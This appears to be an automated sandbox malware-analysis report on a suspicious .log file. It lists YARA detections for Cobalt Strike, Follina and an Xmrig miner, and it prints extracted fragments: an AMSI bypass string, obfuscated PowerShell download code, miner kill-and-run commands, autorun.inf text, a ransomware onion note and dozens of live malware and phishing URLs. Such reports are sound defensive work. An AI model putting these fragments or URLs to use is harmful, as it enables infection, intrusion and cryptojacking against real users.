Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log

Overview

General Information

Sample Name:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
Analysis ID:743454
MD5:988e0cb19fbc2cf5e3b9a33b205affd8
SHA1:1b091e30aa366a5cdf582a81954893ac6201f769
SHA256:c289adee6ca95bb69f864497f32a8abbad65d20dccd06c4a1f6c3ef6d402693d
Infos:

Detection

CobaltStrike, Follina CVE-2022-30190, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara detected CobaltStrike Stager
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected AntiVM3
Found strings related to Crypto-Mining
Found Tor onion address
Queries the volume information (name, serial number etc) of a device
Yara signature match
May infect USB drives

Classification

Process Tree

  • System is w10x64
  • notepad.exe (PID: 5416 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x4724:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x4724:$r2: p^o^w^e^r^s^h^e^l^l
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
  • 0x20dbf2:$s4: system.net.webclient).downloadfile("http
  • 0x8eb6:$s5: getstring([convert]::frombase64string(
  • 0x10c936:$s5: getstring([convert]::frombase64string(
  • 0x20328f:$s5: getstring([convert]::frombase64string(
  • 0x20cdf3:$s5: getstring([convert]::frombase64string(
  • 0x40e7d7:$s5: getstring([convert]::frombase64string(
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logPS_AMSI_BypassDetects PowerShell AMSI BypassFlorian Roth
  • 0x40a8b2:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Click to see the 6 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x8e88:$r1: p^o^w^e^r^s^h^e^l^l
      • 0x8e88:$r2: p^o^w^e^r^s^h^e^l^l
      00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
          00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePasswordDetects PowerShell content designed to retrieve passwords from hostditekSHen
          • 0x81c9d4:$namespace: windows.security.credentials.passwordvault
          • 0x212ac8:$method1: retrieveall()
          • 0x212af8:$method2: .retrievepassword()
          Process Memory Space: notepad.exe PID: 5416SUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
          • 0x37494a:$r1: p^o^w^e^r^s^h^e^l^l
          • 0x37494a:$r2: p^o^w^e^r^s^h^e^l^l
          Click to see the 8 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logVirustotal: Detection: 16%Perma Link
          Antivirus detection for URL or domain
          Source: http://www.bonusesfound.ml/update/index.phpAvira URL Cloud: Label: malware
          Source: http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.docAvira URL Cloud: Label: malware
          Source: https://www.sputnikradio.net/radio/news/Avira URL Cloud: Label: malware
          Source: http://usa-national.info/gpu/band/grumble.dotAvira URL Cloud: Label: malware
          Source: http://192.210.240.8/doc_document/188.docAvira URL Cloud: Label: malware
          Source: https://tph786.com/sale/images/avatar/Avira URL Cloud: Label: phishing
          Source: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=Avira URL Cloud: Label: phishing
          Source: https://blackberryizm.com/frontend/assets/images/favico/report-fedex.phpAvira URL Cloud: Label: phishing
          Source: http://outfish.bounceme.net/outl.dotAvira URL Cloud: Label: malware
          Source: http://ppaauuaa11232.cc/dlx5rc.dotmAvira URL Cloud: Label: malware
          Source: https://tpow.zeroworld.xyz/home/application/views/sistem/notifikasi/usqg66westx.phpAvira URL Cloud: Label: phishing
          Source: http://windowsdefendergateway.duckdns.org/documents.docAvira URL Cloud: Label: malware
          Source: http://83.166.246.59/sgz2/rejoice/lowered.dotAvira URL Cloud: Label: malware
          Source: http://198.23.156.247/receipt/receipt.docAvira URL Cloud: Label: malware
          Source: http://192.3.152.171/Avira URL Cloud: Label: malware
          Source: https://hide.link/lfspzAvira URL Cloud: Label: phishing
          Source: http://103.167.90.69/receipt/inv_126776.wbkAvira URL Cloud: Label: malware
          Source: http://kitten-268.frge.io/article.htmlAvira URL Cloud: Label: malware
          Source: http://usb.mine.nu/c.sh-o/users/shared/c.shAvira URL Cloud: Label: phishing
          Source: http://49.234.67.167/Avira URL Cloud: Label: malware
          Source: http://filecopying.xyz/update/kbp08xAvira URL Cloud: Label: malware
          Source: http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=Avira URL Cloud: Label: malware
          Source: http://3.104.223.22/dhl/receipt.docAvira URL Cloud: Label: malware
          Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.docAvira URL Cloud: Label: malware
          Source: https://pigeonious.com/img/Avira URL Cloud: Label: malware
          Source: http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/Avira URL Cloud: Label: malware
          Source: http://103.167.93.37/invoice/invoice_000499000049.wbkAvira URL Cloud: Label: malware
          Source: https://rawcdn.githack.net/up.php?key=5Avira URL Cloud: Label: malware
          Source: https://hosteriaestilonorte.com.ar/admins/uzie/actions.phpAvira URL Cloud: Label: phishing
          Source: http://83.166.246.59/ua-lt98brkc2/perform/luck/Avira URL Cloud: Label: malware
          Source: http://yourcontents.xyz/0758/0806pnAvira URL Cloud: Label: phishing
          Source: http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3Avira URL Cloud: Label: malware
          Source: http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.docAvira URL Cloud: Label: malware
          Source: https://teachon.aerialview.lk/systemdemo/uploads/addons/__macosx/live-class/f2u4p7u3jk.phpAvira URL Cloud: Label: malware
          Source: http://false.grafitto.ru/dch00-01/rehearsal.dotAvira URL Cloud: Label: malware
          Source: https://office.michiganappellateblog.com/soft.dllAvira URL Cloud: Label: malware
          Source: http://103.167.90.177/shpdocument/invc_0098008.wbkAvira URL Cloud: Label: malware
          Source: https://bb.realestateprivateportfolio.com/img/Avira URL Cloud: Label: malware
          Source: http://www.comeinbaby.com/updateerror/fiifAvira URL Cloud: Label: malware
          Source: http://209.127.20.13/b44u8j.dotmAvira URL Cloud: Label: malware
          Source: http://lump.semara.ru/dch00-01/counter/nearest/Avira URL Cloud: Label: malware
          Source: http://172.245.119.43/recept/34.docAvira URL Cloud: Label: malware
          Source: http://thomastongrealestate.com/skywkc/3415201.pngaAvira URL Cloud: Label: malware
          Source: https://ab.v-mail.online/?e=Avira URL Cloud: Label: phishing
          Source: https://lidamtour.com/masivo/file/kmshost/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: http://www.bonusesfound.ml/update/index.phpVirustotal: Detection: 10%Perma Link

          Exploits

          barindex
          Yara detected Microsoft Office Exploit Follina CVE-2022-30190
          Source: Yara matchFile source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara matchFile source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara matchFile source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR
          Found strings related to Crypto-Mining
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: c .conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: j grep-vgrep|grep"xmr.crypto-pool.fr:3333"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"monerohash.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: c .conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: c .conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
          Source: Binary string: )9 /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mpengine.pdb OGPS source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b [autorun]
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b .aziamdescoperit,sianumeautorun.inf.incsiind.inc:[autorun];;open=uksjhr.exe;qkkvolggsbvrgecqsxac
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b .aziamdescoperit,sianumeautorun.inf.incsiind.inc:[autorun];;open=uksjhr.exe;qkkvolggsbvrgecqsxac

          Networking

          barindex
          Found Tor onion address
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b <b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: <b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: b<b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: m targetpath="http://www.youtube.com/t3chyy"ourllink.savesetourllink=wshshell.createshortcut("fucked equals www.youtube.com (Youtube)
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://103.133.106.72/ini/................wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://103.155.83.184/invoice/inv_3452323.wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://103.155.83.184/wireadv/invc_9800232.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.167.84.138/receipt/invc_0000560001.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.167.90.177/shpdocument/invc_0098008.wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://103.167.90.69/receipt/inv_126776.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.167.93.12/invoice/invoice_000300020.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.167.93.37/invoice/invoice_000499000049.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.170.255.140/documents/invc_0044050506000.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.171.0.220/receipt/invoice_008789000.wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://106.15.186.165/mstdx86.html(x-usc:http://106.15.186.165/mstdx86.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.145/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.102/hhh/invc_005400005400.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.173.219.125/msoffice/msoffice.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://117.48.146.246:8008/exploit.htm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.234.135.58/loadingupdate.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.119.43/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.119.43/recept/34.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://185.172.110.217/kvsn/image.png
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.173.34.107/office/document.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://185.222.58.102/invoice/inv_9002343.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.127.254.159/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.219.10/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.219.10/office/doc13/dc.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://192.210.240.8/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.240.8/doc_document/188.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.240.8/inv/323.doc?
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://192.227.168.187/receipt/office_
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://192.3.110.133/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.110.133/dhl/125.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.110.172/documents/invc_009030009.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.162/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://192.3.141.173/word/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.152.171/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.169.253.204/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.123.210.174/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.107.11/....document........document/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.91.160/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.23.156.247/receipt/receipt.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.23.207.54/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://2.56.59.196:8000/index.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.51.227.181/layout20223acb.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://202.55.132.141/invoice/inv_009000987.wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://202.55.132.141/receipt/inv_2331122.wbk
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://209.127.20.13/b44u8j.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://209.141.40.190/xms
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://209.141.40.190/xms/tmp/xms
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://213.109.192.61/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://217.195.153.111/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.29.125.210/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.174.158/document/invc_00000023444.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.122.25/.-
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.52.140/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://23.95.52.140/win32/documentdoc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://23.95.85.171/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.104.223.22/dhl/receipt.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://3.134.125.175:9999/index.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.139.50.24/prv.php?id=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.70.225.229/inv/inv.doc?
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.53/2x/img_05421065.exe
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.31.232/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.150.67.233/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.67.229.164:7497/payload.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.76.53.253/1.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.76.53.253/1.htmlhttp://45.76.53.253/1.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://49.234.67.167/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.92.205.91/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.118.21.70/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://83.166.242.164/desktop-st7lsde/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.166.246.59/ua-lt98brkc2/perform/luck/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://93.115.26.76:8000/index.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://a0708743.xsph.ru/regain/regions.pdf/f
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://acetica.online/presently/refuge/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aktualizieren-wolke.de/99.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arcorretoradeseguros.eating-organic.net
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://atozlovebook.com/vision.iosapp-o%appdata%
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://belkus.bounceme.net/preparation/bars/relation/heading/toppbw.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/clamp.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cakemixturereview.xyz/wp-includes/u2ayyvcprhwqeryw4/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://cdn.$
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://comunicaagorane.myvnc.com/cnre/out/gravadados.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://datasecure.icu/kb4209t/09xp
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://decoderswlezrsa7.onion
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://diagnostic.htb:
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docria.github.io
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://domainandserversecurityupdatedcomplete.duckdns.org/msoffice/document_012000.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://earium.ru/ua-lt5cg63120d6/country/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://egyptianredcrescent-alex.com/ucount=www.standardbankonline.encrypted/php/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://false.grafitto.ru/dch00-01/rehearsal.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://filecopying.xyz/update/kbp08x
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://files.telefacer.com/1/18.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://files.telefacer.com/1/2.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fusari.ru/904ce54ddc27/glitter/glitter1/salvage.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://gca.co.za/wp-content/plugins/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://github.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://goo.gl/
